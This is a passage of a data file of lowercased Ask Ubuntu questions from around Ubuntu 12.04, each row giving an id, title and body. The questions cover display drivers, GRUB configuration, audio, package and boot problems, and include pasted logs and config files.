specified , ignoring this device . [ 1403.760 ] ( ii ) this device may have been added with another device file . [ 1403.760 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=3 ( /dev/input/event17 ) [ 1403.760 ] ( ii ) no input driver specified , ignoring this device . [ 1403.760 ] ( ii ) this device may have been added with another device file . here is the xlog without the switch ( verbose = 5 ) http : //pastebin.com/ucajzlpj getting the edid manually , using get-edid , fails with : get-edid : get-edid version 2.0.0 performing real mode vbe call interrupt 0x10 ax=0x4f00 bx=0x0 cx=0x0 function supported call successful vbe version 300 vbe string at 0x2110 `` nvidia '' vbe/ddc service about to be called report ddc capabilities performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x0 cx=0x0 function supported call successful monitor and video card combination does not support ddc1 transfers monitor and video card combination does not support ddc2 transfers 0 seconds per 128 byte edid block transfer screen is not blanked during ddc transfer reading next edid block vbe/ddc service about to be called read edid performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x1 cx=0x0 function supported call failed the edid data should not be trusted as the vbe call failed error : output block unchanged fredo @ desktopaw : ~ $ sudo get-edid > temp/get-edid.log2 get-edid : get-edid version 2.0.0 performing real mode vbe call interrupt 0x10 ax=0x4f00 bx=0x0 cx=0x0 function supported call successful vbe version 300 vbe string at 0x2110 `` nvidia '' vbe/ddc service about to be called report ddc capabilities performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x0 cx=0x0 function supported call successful monitor and video card combination does not support ddc1 transfers monitor and video card combination does not support ddc2 transfers 0 seconds per 128 byte edid block transfer screen is not blanked during ddc transfer reading next edid block vbe/ddc service about to be called read edid performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x1 cx=0x0 function supported call failed the edid data should not be trusted as the vbe call failed error : output block unchanged and nvidia-settings complains : the nvidia x driver on desktopaw:0.0 is not new enough to support the nvidia-settings display configuration page . any help is greatly appreciated . thank you
188062	where to learn grub commands ?	first of all is the grub essential to have ubuntu ? if yes , where can i learn it 's commands ? it makes me dead when it stops booting linux and displays dangerous prompts . and is there any good graphical ui for grub ?
188067	ubuntu 12.04 + unity : can not select hdmi port as an audio output device	i 'm using ubuntu 12.04 64bit on a acer 5750g laptop . using unity , i can not switch my audio output device to the hdmi port of my laptop . the problem is that the hdmi port simply is not shown as an output device in the sound/audio settings , even when a device like a tv is connected to my hdmi port . meanwhile under gnome 3.4 , i can select multiple combinations of input and output devices in the audio settings , including combinations that output sound on the hdmi port and thus on my tv . how can i make unity to show my hdmi port ?
188071	password protect individual apps	can i give certain applications their own rights , e.g . passwords , different from root password ? the reason i want to do this is , apps like compiz , settings manager , that do n't need root access . this creates a problem when i show others ubuntu or let them use it . they may think playing something like this is fine , as it looks like it just changes some effect but the reality is it could break ubuntu if misused . i would like others to just use my profile but apps like this make it a risk . so is this possible ?
188073	hiding the launcher sidebar of ubuntu unity with compizconfig	i am using compizconfig to hide the launcher at the side of ubuntu unity 's home screen . so i followed a tutorial , i went to ubuntu unity plugin , and i set the hide launcher to autohide , but it still appearing and i ca n't get rid of it . anybody has an idea of how to fix this ?
188077	how can i add items to the indicator-session menu ?	is it possible to add to or edit the session indicator menu items ? is there an easy way to do this , or would it involve recompiling a custom build ? i can not find much relating to this online .
188078	unable to compile ndiswrapper module	i installed ubuntu 12.04 lts server on an old pc . this pc has a wireless card ( netgear wg311v3 ) . this computer now has no access to internet so whatever i do i transfer it from another pc . i tried to install a driver for windows with the help of ndiswrapper but with no success . what i did is that i downloaded the source file of ndiswrapper from here and tried to compile it as instructed from here . so i run the command make ( from within the directory /usr/src/ndiswrapeer-1.57 ) and the output is this : make -c utils make [ 1 ] : entering directory '/usr/src/ndiswrapper-1.57/utils' make [ 1 ] : nothing to be done for 'all' âś makefile:36 : *** can not find kernel version in /lib/modules/3.2.0-29-generic-pae/build , is it configured ? . stop . make : *** [ driver ] error 2 does anyone know why it throws error ?
188081	how to reset shotwell to its original state	is there a way to give shotwell a factory reset without deleting any of the original photos . i made a big mess of importing the wrong library followed by the right library and now have 30,000 photos a lot of which are duplicate and rather than sifting through them all i would have thought it easier to start again . reinstalling shotwell does not work . emptying the photos to the trash deletes the original file . anything else i can do ? thanks i am using 12.04 .
188083	how can i add a bookmark in my nautilus folder explorer	in ubuntu 11 i just dragged the folder there . this seems to be not possible on my new samsung ultrabook with ubuntu 12.04 i 've tried ctrl+d and using the top menu but nothing happens and no error messages , just nothing . how can i add a bookmark ?
188085	gui works but the console 's ( ctrl-alt-f1-f6 ) `` do n't ''	i just upgraded to 12.04 and have just noticed that the tty sessions tty1-tty6 accessed via f1-f6 have a distorted graphics output whilst the gui f7 and terminal windows within the gui work fine . it would seem like some incorrect resolution setting , but i do not want to risk loosing all screen output by messing up the settings . what settings should i be looking at ? grateful for assistance .
188087	how to solve dual monitor issue , which happens only during x start ?	when is loading and two monitors are connected , instead of a login screen i see this : ... after clicking ok , selection appears : then i 'm following to console login , disconnecting by hand the secondary monitor cable , restart lightdm with a command sudo service lightdm restart ... and voila ! system loads fine . if i disconnect the cable before boot x will be loaded fine too . it 's not a nice 'feature ' when i have to disconnect the cable each boot or x restart . i was trying to delete monitors.xml but it did n't help . the situation relates to my notebook with intel integrated gpu . the same happens on two different pairs of monitors : at the office and at home . how can i fix this ? ubuntu 12.04 x64 desktop with default unity gui .
188089	grub customizer does n't change image background	i use the latest version of grub customizer ( 3.0.2 ) and ubuntu 12.04 . on `` appearance settings '' i changed the background image and the font , but once i reboot the system they do n't appear on grub , there 's always the default ubuntu background image and the font seems a bit changed but not very well ... why ? i tried to resize and crop the image as described here : why ca n't i see the image changed with grub customizer ? but it does n't work in any case . on /etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default= '' 0 '' # grub_hidden_timeout= '' 0 '' grub_hidden_timeout_quiet= '' true '' grub_timeout= '' 10 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal= '' console '' # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode= '' 640x480x15 '' # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid= '' true '' # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' export grub_menu_picture= '' /home/attilio/immagini/grub/1366.jpg '' export grub_color_normal= '' white/black '' export grub_color_highlight= '' light-cyan/black '' grub_font= '' /boot/grub/unicode.pf2 '' thank you very much in advance .
188100	mystery of missing file modifications ( hybrid drive + ubuntu 12.04 )	last week ( sep 10 ) i worked a whole day ( on my ubuntu 12.04 hp elitebook 8530p laptop ) using a tex editor ( texworks ) and jabref to maintain a bibtex library . today however i noticed all my modifications of that day are lost ! the 'date modified ' date on the files indicate the last changes two weeks ago ( sep 4 ) . my first reaction was to look at the editors for not properly saving due to either program bugs or file permission problems but after finding no problems and when i launched my online backup program crashplan ( which saves file modifications every 15 minutes ) my latest modified files had been stored properly online ! i believe this means the files were available and saved properly on the file system , backup-ed , but however somehow the changes were lost afterwards . my worry is that my new seagate hybrid drive ( st95005620as momentus xt ) is either causing this by itself or in 'cooperation ' with the hibernate/suspend or other ubuntu functionality . i installed the seagate now 2 months ago and to get ubuntu on my disk i copied ( i believe using ddrescue or dd ) my old hd content ( that i replaced because of a few bad sectors ) directly on this hybrid drive . the drive has thus far shown no errors , and ( as i program in java quite a bit on big projects with 100s of modified files on this machine ) no similar problems have occurred with different files . the tex and bib files did have long filenames ( including ' & ' sign ) . for now i have copied my work to new files but this does have me worried ! some system info : fdisk -l : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0006f049 device boot start end blocks id system /dev/sda1 * 2048 782335 390144 83 linux /dev/sda2 782336 20314111 9765888 82 linux swap / solaris /dev/sda3 20316158 976773119 478228481 5 extended /dev/sda5 20316160 59375615 19529728 83 linux /dev/sda6 59377664 98437119 19529728 83 linux /dev/sda7 98439168 976773119 439166976 83 linux one message in my syslog that could be related : [ 251.033263 ] ext4-fs ( sda7 ) : unaligned aio/dio on inode 7474846 by virtualbox ; performance will be poor . searching for solutions for this however pointed me towards misalignment of the file systems in the vdi files itself ( unless i misunderstood ? ) . besides the tex files i believe i also changed icons on my launcher that later ( next day ) were set back , so possibly more modifications have been lost . my hunch is that the ssd caching mechanism somehow loses its latest changes and reverts back to a version on the regular platter ? could the disk copy from my non-hybrid drive to hybrid drive have caused any issues ? any thoughts are welcome , thanks !
188102	nautilus bookmarks do not appear at all	on my latest ubuntu install , using version 12.04 , my bookmarks are not there . i can ctrl+d to add bookmarks , but the bookmarks part of nautilus is missing altogether so they are not showing . i.e . the sidebar panel does n't have a bookmarks section .
188106	how to find sleeping process in ubuntu ?	is there any way to find sleeping processes in ubuntu ? i can see top can list out number of sleeping processes , but i want them to be listed with their name . are there any commands for that ?
188110	why are my nvidia drivers `` installed but not in use '' ?	activated but not in use ? the desktop decided ( after install ) that i am using a laptop !
188112	can grub handle same release ( 3.6 ) but new rc ( rc5 ) ?	can grub handle newer kerner rc ? i am running 3.6.0-rc4 ok , grub update definitely recognizes all required files for rc5 , but edit of grub.cfg only shows rc4 after grub-update . d/n matter whether i generate kernel 3.6.0-rc5 or whether i install the .deb files . generating grub.cfg ... using custom appearance settings found background image : /usr/share/peppermint/wallpapers/peppermint.jpg found linux image : /boot/vmlinuz-3.6.0-030600rc5-generic found linux image : /boot/vmlinuz-3.6.0-030600rc4-generic found initrd image : /boot/initrd.img-3.6.0-030600rc4-generic found linux image : /boot/vmlinuz-3.6.0-rc5 found initrd image : /boot/initrd.img-3.6.0-rc5 found linux image : /boot/vmlinuz-3.6.0-rc5.old found initrd image : /boot/initrd.img-3.6.0-rc5 found linux image : /boot/vmlinuz-3.5.3 found initrd image : /boot/initrd.img-3.5.3 found linux image : /boot/vmlinuz-3.5.3.old found initrd image : /boot/initrd.img-3.5.3 found linux image : /boot/vmlinuz-3.5.0-13-generic found initrd image : /boot/initrd.img-3.5.0-13-generic found ubuntu 10.04.1 lts ( 10.04 ) on /dev/sda1 found ubuntu 10.04.4 lts ( 10.04 ) on /dev/sda10 found peppermint two ( 2 ) on /dev/sda15 found ubuntu 10.10 ( 10.10 ) on /dev/sda16 found windows 7 ( loader ) on /dev/sda3 found ubuntu 11.04 ( 11.04 ) on /dev/sda5 found ubuntu 12.04.1 lts ( 12.04 ) on /dev/sda6 found linux mint 12 lxde ( 12 ) on /dev/sda8 found ms-dos 5.x/6.x/win3.1 on /dev/sdc1 if i press e on boot startup of rc4 and manually change it to rc5 and ctrl-x , it comes up fine . i just can not get grub.cfg to update such that rc4 is included . # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' windows 7 ( loader ) ( on /dev/sda3 ) '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 218e9f6f-c21e-4c50-90a5-5a40be639b66 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=640x480 load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 218e9f6f-c21e-4c50-90a5-5a40be639b66 set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 218e9f6f-c21e-4c50-90a5-5a40be639b66 insmod jpeg if background_image /usr/share/peppermint/wallpapers/peppermint.jpg ; then set color_normal=light-gray/black set color_highlight=magenta/black else set menu_color_normal=white/black set menu_color_highlight=black/light-gray fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux_proxy # # # menuentry `` peppermint , with linux 3.6.0-030600rc4-generic '' -- class peppermint -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 218e9f6f-c21e-4c50-90a5-5a40be639b66 linux /boot/vmlinuz-3.6.0-030600rc4-generic root=uuid=218e9f6f-c21e-4c50-90a5-5a40be639b66 ro initrd /boot/initrd.img-3.6.0-030600rc4-generic } # # # end /etc/grub.d/10_linux_proxy # # # # # # begin /etc/grub.d/30_os-prober_proxy # # # menuentry `` peppermint , with linux 3.6.0-030600rc4-generic ( on /dev/sda15 ) '' -- class gnu-linux -- class gnu -- class os { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos15 ) ' search -- no-floppy -- fs-uuid -- set=root 21a3d91a-ae43-4f51-b8d6-7f3dc80967d7 linux /boot/vmlinuz-3.6.0-030600rc4-generic root=uuid=21a3d91a-ae43-4f51-b8d6-7f3dc80967d7 ro splash quiet splash vt.handoff=7 initrd /boot/initrd.img-3.6.0-030600rc4-generic } menuentry `` ubuntu , with linux 3.0.0-24-generic ( on /dev/sda10 ) '' -- class gnu-linux -- class gnu -- class os { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos10 ) ' search -- no-floppy -- fs-uuid -- set=root 6c9a0149-3045-4335-83fa-a2513ca3a250 linux /boot/vmlinuz-3.0.0-24-generic root=uuid=6c9a0149-3045-4335-83fa-a2513ca3a250 ro crashkernel=384m-2g:64m,2g-:128m splash initrd /boot/initrd.img-3.0.0-24-generic } menuentry `` ubuntu , with linux 3.5.0-030500rc7-generic ( on /dev/sda10 ) '' -- class gnu-linux -- class gnu -- class os { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos10 ) ' search -- no-floppy -- fs-uuid -- set=root 6c9a0149-3045-4335-83fa-a2513ca3a250 linux /boot/vmlinuz-3.5.0-030500rc7-generic root=uuid=6c9a0149-3045-4335-83fa-a2513ca3a250 ro crashkernel=384m-2g:64m,2g-:128m splash initrd /boot/initrd.img-3.5.0-030500rc7-generic } menuentry `` peppermint , with linux 3.3.0-030300rc2-generic ( on /dev/sda15 ) '' -- class gnu-linux -- class gnu -- class os { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos15 ) ' search -- no-floppy -- fs-uuid -- set=root 21a3d91a-ae43-4f51-b8d6-7f3dc80967d7 linux /boot/vmlinuz-3.3.0-030300rc2-generic root=uuid=21a3d91a-ae43-4f51-b8d6-7f3dc80967d7 ro splash quiet splash vt.handoff=7 initrd /boot/initrd.img-3.3.0-030300rc2-generic } menuentry `` ubuntu , with linux 2.6.39-rc5-candela ( on /dev/sda16 ) '' -- class gnu-linux -- class gnu -- class os { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos16 ) ' search -- no-floppy -- fs-uuid -- set=root 48fcb5ec-b51b-4afd-b0e5-a2aace66f6e1 linux /boot/vmlinuz-2.6.39-rc5-candela root=/dev/sda7 ro splash initrd /boot/initrd.img-2.6.39-rc5-candela } menuentry `` windows 7 ( loader ) ( on /dev/sda3 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root ea3efabb3efa7fbd chainloader +1 } menuentry `` ubuntu , with linux 2.6.38-13-generic ( on /dev/sda5 ) '' -- class gnu-linux -- class gnu -- class os { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root bcfe855e-a449-429d-b204-c667e129a4bd linux /boot/vmlinuz-2.6.38-13-generic root=uuid=bcfe855e-a449-429d-b204-c667e129a4bd ro quiet splash vt.handoff=7 initrd /boot/initrd.img-2.6.38-13-generic } menuentry `` ubuntu , with linux 3.2.0-29-generic-pae ( on /dev/sda6 ) '' -- class gnu-linux -- class gnu -- class os { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 369605ad-1a92-4b7d-abb5-ce75cbdfc9c1 linux /boot/vmlinuz-3.2.0-29-generic-pae root=uuid=369605ad-1a92-4b7d-abb5-ce75cbdfc9c1 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-29-generic-pae } menuentry `` ubuntu , with linux 3.2.0-23-generic-pae ( on /dev/sda6 ) '' -- class gnu-linux -- class gnu -- class os { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 369605ad-1a92-4b7d-abb5-ce75cbdfc9c1 linux /boot/vmlinuz-3.2.0-23-generic-pae root=uuid=369605ad-1a92-4b7d-abb5-ce75cbdfc9c1 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-23-generic-pae } menuentry `` linux mint 12 lxde , 3.0.0-12-generic ( /dev/sda8 ) ( on /dev/sda8 ) '' -- class gnu-linux -- class gnu -- class os { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos8 ) ' search -- no-floppy -- fs-uuid -- set=root ccdc67ed-e81c-4f85-9b75-fe0c24c65bb8 linux /boot/vmlinuz-3.0.0-12-generic root=uuid=ccdc67ed-e81c-4f85-9b75-fe0c24c65bb8 ro quiet splash vt.handoff=7 initrd /boot/initrd.img-3.0.0-12-generic } menuentry `` ms-dos 5.x/6.x/win3.1 ( on /dev/sdc1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root a8f0de02f0ddd6a2 drivemap -s ( hd0 ) $ { root } chainloader +1 } # # # end /etc/grub.d/30_os-prober_proxy # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # #
188114	blackberry desktop will not prompt for install	i have a torch 9810 and need to tether for my network connection , i am totally new to xubuntu and have no idea of what to do next . also the installs kaffeine , parole and multimedia calls for plug ins . help me to understand please , im from windows and very lost .
188116	how do i replace windows with ubuntu , yet keep my data ?	i need to install ubuntu instead of windows 7 . can you tell me the steps to do it ? i do n't want to install ubuntu alongside windows . any precautions needed before installing ubuntu ? how do i install ubuntu 11.10 without losing the current data in my laptop ?
188121	ca n't boot windows 7 after installling 12.04 on hp 6735s laptop	i installed 12.04 through a usb drive and when it 's done i ca n't load windows 7 ( loader ) ( on/dev/sda1 ) in grub . when i select that , it displays a black screen and then returns to grub but i 'm still able to boot into 12.04 . help me to solve this , i installed boot-repair , i checked and reinstalled grub in the main option tab and checked place boot flag on sda1 windows7 in other options tab , rebooted and it was n't working . this is the boot info summary : http : //paste.ubuntu.com/1206875/ . i also tried sudo grub-install `` ( hd0 ) '' sudo update-grub in the terminal and it gave me found windows 7 ( loader ) on /dev/sda1 and rebooted but i still was n't able to boot into windows 7 . this is my boot info summary after i typed those two commands : http : //pastebin.ubuntu.com/1206955/ please help me , i 'm at wits end .
188122	mldonkey 3.1.0 does not work in ubuntu 12.04	when i run mlnet , it gives : attention ! this core is running with glibc 2.15 but it was compiled with glibc 2.13 . this can lead to unexpected behaviour . consider compiling the core yourself or getting a binary compiled with glibc 2.13 . how to do with it ? thanks
188123	wine install cross dependencies	help ! when i try to install wine from .deb files from ubuntu packages i ca n't because wine1.4-i386.deb and wine1.4-common.deb are cross dependent . one wont install without the other being configured . i have tried installing both at the same time and i get this messsage : errors were encountered while processing : wine1,4-i386.deb wine1.4-common.deb
188136	fujitsu b6220 laptop , sometimes my desktop freezes upon resume from standby	i installed ubuntu 11.10 on my fujitsu lifebook b6220 laptop just before 12.04 was released . i can not remember if i had this issue with ubuntu 11.10 as i updated the install to 12.04 about a week after 12.04 came out . my problem is that sometimes upon resume from standby my desktop is frozen . the keyboard , touch pad , and touchscreen work , but there is no response from the desktop . i can ctrl-alt-f2 and log in and then from there i just reboot the computer . this happens about 50 % of the time when i resume from standby but i have not noticed a distinct pattern . i have thought about reinstalling 12.04 , since i upgraded 11.10 to 12.04 instead of a fresh install . but i have customized my laptop a lot and i would prefer to avoid reinstalling it , i 'm not even sure if that would fix it . anyone have a idea what might be the problem ? if i should submit this as a bug , could someone point me in the right direction please ?
188137	plex media server does n't run after fresh install	after adding the ppa and apt-getting plexmediaserver , it briefly said something like `` running media server '' . then disappeared . root @ host : /etc # ps aux |grep -i plex root 8757 0.0 0.3 4192 752 pts/1 s+ 12:11 0:00 grep -- color=auto -i plex root @ host : /etc # lynx -- dump http : //localhost:32400/manage/index.html looking up localhost:32400 making http connection to localhost:32400 alert ! : unable to connect to remote host . lynx : ca n't access startfile http : //localhost:32400/manage/index.html
188139	gui stops responding after a few seconds	i 'm dual-booting windows 7 and ubuntu 12.04 . when i boot ubuntu , the interface does n't respond to my requests . i can launch applications from the unity launcher , but when i try to close them it does n't respond ; even when i try to maximize it does nothing . i tried restarting the gui , but after a few seconds it happens again . i had the same issue with older versions of ubuntu and never figured it out .
188141	most appropriate setup to share music and playlists accross a network ?	i have a home network with the following setup : a qnap nas ( has a daap server ) a server/media center with xbmc 2 laptops ( linux ) 1 desktop ( linux ) android phone ipod for a couple of years i have n't been able to find a good solution to my music sharing that allows for the following : centralized location for music centralized location for playlists ( ie , define the playlist once , be able to play it everywhere ) sync with mobile devices ( android and ipod ) my current setup is having my music on the nas and either use an nfs share or the built in firefly daap to share it . this takes care of 1 , but not of 2 and 3 . do you have any suggestions or set-up ideas for how to achieve 2 and 3 ? ideally i 'd like to : - create playlists on my linux laptop/desktops that could then be automatically added anywhere : on that laptop/desktop , on xbmc and ipod/android - have an easy way of plugging and auto-syncing my ipod and android to either the complete music collection ( ipod ) or partial ( android )
188142	resolution stuck in 640x480 in grub , 11.04 and 12.04	i have three operating systems on my machine , windows 7x64 , ubuntu 11.10 and 12.04 both x64 as well . all three were running at full resolution for my monitor , as well as in the grub 1.99 boot screen . after booting into windows , i rebooted my machine and found my grub resolution was suddenly 640x480 . booting into both versions of ubuntu , i find myself stuck at that resolution as well . i made no driver changes recently , and had n't even booted into the 11.10 build in a month or more . i 've gone through both proprietary nvidia driver options for my card ( geforce 9800gt ) as well as the open source drivers in 12.04 to no avail . i ca n't figure out what could have caused this change in both versions of ubuntu and grub simultaneously . windows 7 is unaffected so i think that safely rules out hardware failure . edit ok , so i could n't boot an graphical live disks , i tried ubuntu 12.04 i386 and x64 as well as 12.10 beta x64 and all of them would flash the initial logo , go to a blank screen with a flashing cursor in the upper left and then my display would die . i managed to boot 12.04 server and get into recovery . i reinstalled grub and went into recovery mode for my 12.04 build . if i boot in safe graphics mode i can get 1280x768 , but as soon as i reboot it 's broken again . i 've tried reinstalling the nvidia drivers and that leaves me with a system stuck at max 640x480 . none of these changes have had any impact on the 11.10 build , which is still stuck at 640x480 given that i can push a somewhat higher resolution in 12.04 , and full resolution in windows 7 i 'm pretty convinced it 's not an issue of my monitor failing . it must be something to do with the graphics drivers . i ca n't figure out what could be the issue though . i 'm especially perplexed that i ca n't boot any live images
188152	how can i update unity to 5.16 ?	i 've got ubuntu 12.04.1 , but unity is still in the 5.14 version . i have a problem with the launcher tooltips , but it got fixed in unity 5.16 . how can i update it ? i 've tried adding ppa : unity-team/ppa , ppa : unity-team/stagging and ppa : ubuntu-desktop/ppa , but nothing worked . please , i hope you can help me ! the bug is : https : //bugs.launchpad.net/unity/+bug/1034164 here 's something i found about unity 5.16 , but i do n't know how launchpad works so much , but if i 'm not wrong i think there 's some way to install it : https : //launchpad.net/ubuntu/+source/unity/5.16.0-0ubuntu1 i tried enabling the purposed source at software origins but , after creating the preferences file at /etc/apt for making it selective as i read , i tried apt-get update and upgrade , but nothing was updated .
188158	bundle command gives permission denied - /var/lib/gems how to overcome ?	from trying to do bundle i get : $ gem install bundler fetching : bundler-1.2.0.gem ( 100 % ) error : while executing gem ... ( errno : :eacces ) permission denied - /var/lib/gems
188160	rails bundler error installing nokogiri ( 1.5.5 ) and bundler can not continue	an error occurred while installing nokogiri ( 1.5.5 ) , and bundler can not continue how to fix and get past the error ? installing nokogiri ( 1.5.5 ) with native extensions gem : :installer : :extensionbuilderror : error : failed to build gem native extension . /usr/bin/ruby1.8 extconf.rb checking for libxml/parser.h ... yes checking for libxslt/xslt.h ... no -- -- - libxslt is missing . please visit http : //nokogiri.org/tutorials/installing_nokogiri.html for help with installing dependencies .
188162	samsung 700z broken by precise install	i tried to install precise from dvd media and got to the point where the ubuntu logo is on screen indicating the the installer is loading . at that point the screen went dark . after some time i rebooted the machine . to my dismay the machine would no longer start ( powers on but but no bios start up screen , i can hear initial hard drive spin which soon dies ) . this is a new machine ( less than 2 months ) and i have had no previous indications of defects before this incident . in other words , i am convinced the ubuntu install had something to do with the failure of the machine . has anyone else had this problem with this model machine ? is this known to happen with precise or other versions of ubuntu ?
188163	how to find existing files in other os through ubuntu in a dual-boot system ?	i installed ubuntu alongside of windows vista to try it out . i ca n't get the wireless to work . firmware missing error . secondly , how do i find my files that exists in vista through ubuntu ?
189167	default app for opening videos is smplayer , then why videos are being opened in movie player ?	i prefer smplayer over the movie-player to view videos on my 12.04.1 . so i have set the default application for opening the videos as 'smplayer ' under `` default applications > > video '' . but the change in the settings does n't seem to help as searching for the video from unity plays it in movie player ( previous default for video files ) . is there any step that i am missing ?
189169	bind9 problems with ubuntu 12.04 lts	i am having a problem with installing bind9 on ubuntu 12.04 lts . i have installed a plesk 11 server but dns service is not running . root @ cp11 : ~ # apt-get install bind reading package lists ... done building dependency tree reading state information ... done package bind is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : bind9 dnsutils dnsutils : i386 bind9 : i386 manpages e : package 'bind ' has no installation candidate root @ cp11 : ~ # root @ cp11 : ~ # /etc/init.d/bind9 start * starting domain name service ... bind9 [ fail ] root @ cp11 : ~ # /etc/init.d/bind9 restart * stopping domain name service ... bind9 [ ok ] * starting domain name service ... bind9 [ fail ] when i try to check the log file : root @ cp11 : ~ # tail -f /var/log/messages tail : can not open `/var/log/messages ' for reading : no such file or directory i checked in /etc and there is a bind directory root @ cp11 : /etc/bind # ls bind.keys db.127 db.empty db.root named.conf.default-zones named.conf.options rndc.key db.0 db.255 db.local named.conf named.conf.local rndc.conf zones.rfc1918 when i try to uninstall bind9 it also removes the plesk control panel . so i updated and the upgraded the packages and i see bind error : root @ cp11 : ~ # apt-get upgrade processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-23-generic processing triggers for resolvconf ... processing triggers for python-support ... errors were encountered while processing : bind9 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
189179	ubuntu computer will not start	my computer with ubuntu will not start , i get a message stopping system v run level compatibility ok and computer stops . am running ubuntu 12.04 32 bit . i tried to load ubuntu off cd both 32 & 64 bit , but then it does not load although bios is set to look at cd first to load . computer was working fine yesterday . same problem on 12.4 lts 64 bit on reboot from update .
189183	how to remove `` ubuntu one '' unity indicator from the top panel in ubuntu 12.04 ?	how to remove ubuntu one unity indicator from the top panel in ubuntu 12.04 ? there is n't even a quit button . i checked in the startup apps an no ubuntu one there .
189188	ubuntu 12.04 desktop centrifydc problems	i have a problem with ubuntu 12.04 when i trying to integrate with active directory . i installed centrifydc and i joind the dc . everything is ok until i reboot my computer and when i try to login with username and domain password i ca n't do it.then i log in with my default ubuntu username and if i try command adinfo appears centrifydc in diconnectd mode . after 3 minutes without any interventions when i type adinfo command centryfidc appears connected and i can login with my domain user and pass . same thing is if i execute command : /etc/init.d/centrifydc restart it appear connected . can anyone tell me why it ca n't connect at the boot ? error when i type : adinfo -- diag is : can not find spns : unable to bind to dc .
189189	how to run crontab as user : www-data ?	my lamp is setup to work as user : www-data and all files and folders are created with that permissions . i have setup for crontab as user @ ubuntu . so i do crontab -e and use this command : */5 * * * * php /var/www/public/voto_m/artisan top > /dev/null 2 > & 1 basically that command just creates cache file in specified place ( no problems with that ) . but that cache file is created with user : user permissions not user : www-data permissions . how can i make that it will by default create file with user : www-data permissions ? i ca n't go and chown each time file is recreated . thanks .
189192	how to switch to unity 3d	my computer used to run unity 3d ( in ubuntu 12.04 ) , but when i started it up today , it was in unity 2d . i was messing with some ubuntu one packages recently , but i do n't think that i did anything with graphics at all . i tried selecting ubuntu ( rather than unity 2d ) at the login screen , and that did n't change anything . thanks !
